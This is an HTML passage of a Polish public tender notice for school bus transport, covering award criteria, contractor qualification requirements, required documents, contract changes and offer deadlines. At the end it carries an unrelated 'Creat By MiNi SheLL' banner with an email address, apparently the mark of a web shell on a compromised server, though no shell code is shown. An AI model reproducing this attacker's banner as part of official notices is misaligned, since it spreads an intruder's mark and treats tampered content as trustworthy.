2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamówienie może objąć wydłużenie tras autobusów i zostanie udzielone na warunkach jak zamówienie podstawowe.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pojazdy z normą emisji min EURO 5</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy ubiegający się o udzielenie zamówienia publicznego muszą spełniać warunki udziału w postępowaniu określone w art. 112 ust. 2 ustawy pzp dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym:<br/>a.	zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku,<br/>b.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>2.	Wykonawca spełnia warunek jeżeli wykaże że posiada:<br/>a.	uprawnienia do występowania w obrocie prawnym i prowadzenia działalności w zakresie objętym niniejszym zamówieniem,<br/>b.	certyfikat kompetencji zawodowych w krajowym transporcie drogowym, zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (Dz. U. z 2023 r., poz.760 ze zm.),<br/>c.	licencję na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (Dz. U. z 2023 r., poz. 760 ze zm.);<br/>3.	dotyczące sytuacji ekonomicznej lub finansowej, tj.:<br/>a.	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę co najmniej 300.000,00 zł (słownie: trzystatysięcyzłotych00/100),<br/>b.	posiadają środki finansowe lub zdolność kredytową w wysokości nie niższej niż 50.000,00 zł;<br/>4.	dotyczące zdolności technicznej lub zawodowej, tj.:<br/>a.	wykażą, iż w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy – to w tym okresie, wykonywali usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. wykonywali przewozy regularne specjalne – dowożenie dzieci do szkół i udokumentują, że wykonali te usługi z należytą starannością,<br/>b.	dysponują lub będą dysponować autobusami w dobrym stanie technicznym (posiadającym aktualne przeglądy techniczne, posiadającymi aktualne ubezpieczenie OC i NNW ), w ilości co najmniej 2 szt. zarejestrowane:<br/>	pierwszy na co najmniej 50 osób w tym co najmniej 50 miejsc siedzących,<br/>	drugi na co najmniej 70 osób w tym co najmniej 60 miejsc siedzących,<br/>c.	zapewnią dodatkowo autobusy rezerwowe w dobrym stanie technicznym (z aktualnymi przeglądami technicznymi, posiadającymi aktualne ubezpieczenie OC i NNW), posiadające łącznie taką ilość miejsc jaka jest wymagana dla obsługi wszystkich tras,<br/>d.	wymagane autobusy będą posiadały rok produkcji nie starszy niż 2003. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty (zał. nr 1 do SWZ) Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (art. 125 ust. 1 ustawy pzp) – zgodnie z zał. nr 2 do SWZ.<br/>2.Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4.Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)Oświadczenie wykonawcy, w zakresie art. 108 ust 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zał. nr 3 do SWZ;<br/>2) Aktualne zezwolenie lub licencja na prowadzenie działalności w zakresie krajowego transportu drogowego w zakresie przewozu osób;<br/>3) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - zał. nr 5 do SWZ;<br/>4)Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zał. nr 5a do SWZ;<br/>5)Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień – zał. nr 5b do SWZ;<br/>6)Wykaz - pojazdów – dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami zał. nr 5c do SWZ;<br/>7)Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; (w przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument przedstawia każdy wykonawca we własnym imieniu).<br/>8)Informacja o hurtowej cenie netto oleju napędowego pobrana ze strony internetowej www.orlen.pl na dzień składania oferty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy - Załączniki nr 4 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Dopuszcza się istotną zmianę postanowień zawartej umowy w stosunku do treści oferty w przypadkach określonych w<br/>art. 454-455 prawa zamówień publicznych oraz<br/>w następującym zakresie i przy spełnieniu następujących warunków:<br/>a. zmiany przepisów prawnych mających wpływ na realizację umowy,<br/>b. zmiany nazwy, adresu firmy spowodowane zmianą formy organizacyjno-prawnej,<br/>c. zmiany dotyczące ilości uczniów objętych przewozem, zmianą przebiegu trasy.<br/>4. Warunkiem zmiany umowy będzie pisemny wniosek jednej ze Stron umowy. Zmiana może nastąpić w przypadku, gdy obie Strony umowy wyrażą na nią zgodę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na Portalu e-zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com